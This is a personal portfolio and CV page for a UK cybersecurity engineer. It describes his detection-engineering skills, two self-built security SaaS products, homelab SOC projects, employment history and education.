singhamanpreet751@gmail.com | +44 7717 109292 | in LinkedIn | ⌥ GitHub | amanpreetmatharu.com
↗ Xposr | ↗ Sentrix | Skilled Worker Visa · Active
Immediately Available · London, UK · Skilled Worker Visa Active
Cyber Security Engineer · Detection Engineer · Platform Builder

Amanpreet
Singh Matharu

Microsoft Sentinel · KQL · Splunk · MITRE ATT&CK · Xposr · Sentrix

I design detection pipelines, operate SOC infrastructure, and independently ship commercial cybersecurity platforms. Xposr exposes verified risk across your attack surface. Sentrix engineers the detections that catch it. Both live, billed, and in production.

View My Work Get In Touch Download CV
5+
Years in Tech
2
Live SaaS Products
20+
KQL Hunt Rules
MITRE
ATT&CK Aligned
Amanpreet Singh Matharu

Amanpreet Singh Matharu

London, UK Skilled Worker Visa
Target Roles
SOC Analyst · Detection Engineer · Security Engineer · Threat Hunter · Sentinel/Splunk Engineer
Location
London & across England · On-site, Hybrid, or Remote · Available now
Notice Period
Immediately available · Skilled Worker Visa active

// 00 — Profile

About Me

I am a Cyber Security Engineer actively seeking my next role in SOC operations or detection engineering. With 5+ years across SIEM platforms, endpoint security, and real-world threat detection, I can contribute to a security team from day one — no ramp-up period needed. Skilled Worker Visa active. Available immediately.

I design and operate SIEM-based detections using Microsoft Sentinel (KQL) and Splunk (SPL) — investigating incidents, tuning alerts, reducing false positives, and improving detection quality. All work is aligned to MITRE ATT&CK, covering identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, and lateral movement.

Beyond traditional security work, I independently design and ship commercial cybersecurity platforms. Xposr — expose what's real. Verification-first security assessment: every finding Confirmed, Likely, or Unverified — no noise. Sentrix — engineer what detects it. SOC rule management from raw log to production-ready Sigma rule. Both are live, billed, and in production.

Currently contracted at Guard IQ (M365, Atera RMM, Huntress EDR) while developing both platforms. I thrive in fast-paced environments, take ownership of problems end-to-end, and communicate clearly with both technical and non-technical stakeholders. Looking for a full-time role where I can protect real infrastructure with real detections.

Amanpreet Singh Matharu
Amanpreet S. Matharu
Cyber Security Engineer
// Current Status
Guard IQ — Sys AdminACTIVE
Xposr · xposr.ioLIVE
Sentrix · sentrix.ioLIVE
Skilled Worker Visa (UK)ACTIVE
// Languages
EnglishPROFESSIONAL
HindiPROFESSIONAL
PunjabiNATIVE
5+
Years in Cyber Security
2
Live SaaS Products Shipped
22
Scanner Modules Built
20+
Custom KQL Detections
MSc
Cyber Security · Merit
UK
Right to Work · Active

// 01 — Expertise

Technical Skills

SIEM & Detection
Microsoft SentinelSplunk EnterpriseKQL (Advanced)SPLLog AnalyticsSigma RulesSigmaHQ
Threat Hunting
MITRE ATT&CKIOC AnalysisFP ReductionBEC AnalysisRansomware DetectionSysmon
Endpoint & Cloud
Defender XDRAzure AD / Entra IDDefender for IdentityMFABitLocker via GPOHuntress EDR
Networking & Infra
TCP/IPDNS / DHCPVLANsFirewallsVPNs (CCNA)DNSSECWiresharkTailscale
Cloud & Ops
RailwayVercelCloudflare TLS/WAFSentryAPSchedulerDocker
Scripting & Automation
PythonBashJSON ParsingRaspberry PiIoT SensorsLinux
Systems Admin
Microsoft 365Exchange OnlineAtera RMMN-ableActive DirectoryGPO
SOC & Incident Response
BEC InvestigationIR PlaybooksAlert TriageNISTSANSAttack Path Analysis

// 02 — Portfolio

Key Projects

LIVE PRODUCTION
Xposr
Verification-First Attack Surface Assessment · xposr.io

No more false-positive noise. Xposr runs 22 parallel scanner modules and classifies every finding as Confirmed, Likely, or Unverified — giving security teams actionable signal, not raw output.

  • 22 parallel scanner modules — Risk Engine, Correlation Engine, Evidence Engine, Executive Translator, Attack Path Builder, AI deduplication
  • SARIF / JSON / CSV export, posture timeline, compliance scoring, scheduled scans, CVSS scoring
FlaskReact 18PostgreSQLRailwaySentry
↗ Live Demo ⌥ GitHub
LIVE PRODUCTION
Sentrix
SOC Detection Engineering & Rule Management · sentrix.io

From raw log to production rule — Sentrix connects your signals, Sigma rules, and MITRE ATT&CK coverage into one engineered detection workflow. Bring-your-own LLM key for AI-assisted rule generation.

  • Sigma rule import/export, SigmaHQ community browser, Splunk & Pi-hole integrations, Detection Lifecycle workspace with Quality / Playbook / MITRE / Coverage tabs
  • Multi-LLM bring-your-own-key, MITRE ATT&CK mapping, sentrix_ API keys for programmatic SOC integration
  • Security-hardened: CSP headers, Cloudflare TLS, Supabase RLS, rate limiting, prompt injection mitigation
Next.js 15SupabaseVercelCloudflareSigmaMITRE ATT&CK
↗ Live Demo ⌥ GitHub
Sentinel Threat Hunting Portfolio
KQL · Sysmon · MITRE ATT&CK
  • 20+ custom KQL queries — PowerShell abuse, C2 beaconing, lateral movement
  • BEC detections: MFA fatigue, inbox rules, token replay
⌥ GitHub
Cowrie SSH Honeypot & SOC Pipeline
Splunk · MITRE ATT&CK · Raspberry Pi
  • Real adversary telemetry → Splunk; MITRE-mapped detections T1110, T1078, T1059
  • IR playbooks for high-severity events
⌥ GitHub
DNS Security Monitoring Platform
Pi-hole · DNSSEC · Splunk · Tailscale
  • Full recursive DNSSEC + Splunk UF; detects DNS tunnelling & beaconing (T1071)
⌥ GitHub
Cyber-Physical SOC: IoT Pipeline
Splunk · Python · Raspberry Pi
  • Sensors → JSON → Splunk UF with SPL time-window correlation for FP reduction
⌥ GitHub

// 03 — Career

Professional Experience

Feb 2026 — Present
Guard IQ
Contract · Remote, UK
ACTIVE
System Administrator
  • Administer Microsoft 365 — Exchange Online, identity management, mailbox administration, and security configurations for client environments.
  • Manage endpoint monitoring, patch management, and remote troubleshooting via Atera RMM and N-able across Windows/Linux fleets.
  • Investigate and remediate endpoint incidents based on Huntress EDR alerts; perform threat triage and root-cause analysis.
  • Implement MFA, conditional access policies, and system hardening across client environments.
2024 — Present
Self-Directed
Independent · Remote
ACTIVE
Independent Cybersecurity Solution Builder
  • Designed and shipped Xposr (xposr-production.up.railway.app) — a verification-first security assessment platform. 22 parallel scanner modules including Risk Engine, Correlation Engine, Evidence Engine, Attack Path Builder, and AI deduplication. CVSS scoring, SARIF/JSON/CSV export, compliance scoring, attack path visualisation. Deployed on Railway.
  • Designed and shipped Sentrix (smartswingalerts.com) — a SOC detection engineering and rule management platform. Full Sigma lifecycle (import/export/SigmaHQ browser), MITRE ATT&CK mapping, Detection Lifecycle workspace, multi-LLM bring-your-own-key, Splunk & Pi-hole integrations, and sentrix_ API keys for programmatic access. Deployed on Vercel.
  • Both platforms security-hardened: CSP headers, Cloudflare TLS, Supabase RLS, rate limiting, prompt injection mitigation, production monitoring via Sentry.
Jan 2023 — Feb 2025
University of West London
Part-time · On-site
Cyber Security Lecturer
  • Delivered hands-on SIEM, incident response, and Active Directory attack labs aligned to real SOC workflows.
  • Guided students through malware behaviour labs, PowerShell investigations, and identity attack simulations (pass-the-hash, Kerberoasting, MFA bypass).
  • Taught Windows Server, Active Directory, VLANs, routing, subnetting, VPNs, and cloud identity security.
  • Developed course materials covering threat hunting methodologies, MITRE ATT&CK mapping, and CTF-style investigation scenarios.
Jan 2021 — Present
Self-Directed
Independent Research
Detection Engineering (Self-Directed)
  • Built cyber-physical SOC prototype: DHT11/PIR/MPU6050 sensors → Raspberry Pi → JSON → Splunk UF with SPL time-window correlation.
  • Deployed Cowrie SSH honeypot, captured real adversary telemetry, built MITRE-mapped detections and IR playbooks in Splunk.
  • Built DNS security monitoring platform: Pi-hole + Unbound + DNSSEC + Tailscale + Splunk — detection of tunnelling and beaconing.
Jun 2018 — Mar 2020
Nagarro
Full-time · Hybrid, India
Information Technology Analyst
  • Administered enterprise Windows/Linux environments; managed Active Directory, GPOs, permissions, and security patching.
  • Configured DNS, DHCP, VPN, and firewall rules; used Wireshark to diagnose network anomalies.
  • Supported internal audits and implemented compliance controls aligned with corporate security requirements.
Ready to contribute to your security team from day one.
SOC Analyst · Detection Engineer · Security Infrastructure · London & England
Email Me Call Me in LinkedIn

// 04 — Academic

Education & Certifications

MSc Cyber Security
University of West London
Feb 2021 – Jul 2022
Merit
Fundamentals of Cybersecurity · Network & Systems Security · Applied Cryptography · Security & Assurance (GRC) · Big Data Analytics
Computer Systems Networking & Telecoms
Jetking
Jun 2017 – Jan 2018
Distinction
CCNA · MCSA · Active Directory · Server 2008/2012/2016 · Routing & Switching · BGP · VLANs · Network Security
BSc Information Technology
Guru Nanak Dev University
2014 – 2017
Foundation in computer science, software engineering, database systems, and networking.
ACTIVESkilled Worker Visa — Right to Work (UK)
ACTIVEMSc Cyber Security — UWL (Merit)
ACTIVENetworking — Jetking (Distinction)
OPER.Atera RMM — Operational Experience
OPER.Huntress EDR — Operational Experience
OPER.Microsoft Sentinel & KQL — Production Use
LIVEXposr · Railway (Live)
LIVESentrix · Vercel (Live)

// 05 — Connect

Get In Touch

Open to SOC Analyst, Detection Engineer, and Security Infrastructure roles across England — on-site, hybrid, or remote. Skilled Worker Visa active. Also open to SaaS collaboration and cybersecurity product partnerships around Xposr and Sentrix.

singhamanpreet751@gmail.com +44 7717 109292 in LinkedIn ⌥ GitHub Portfolio ↗ Xposr ↗ Sentrix
London, UK · Available Now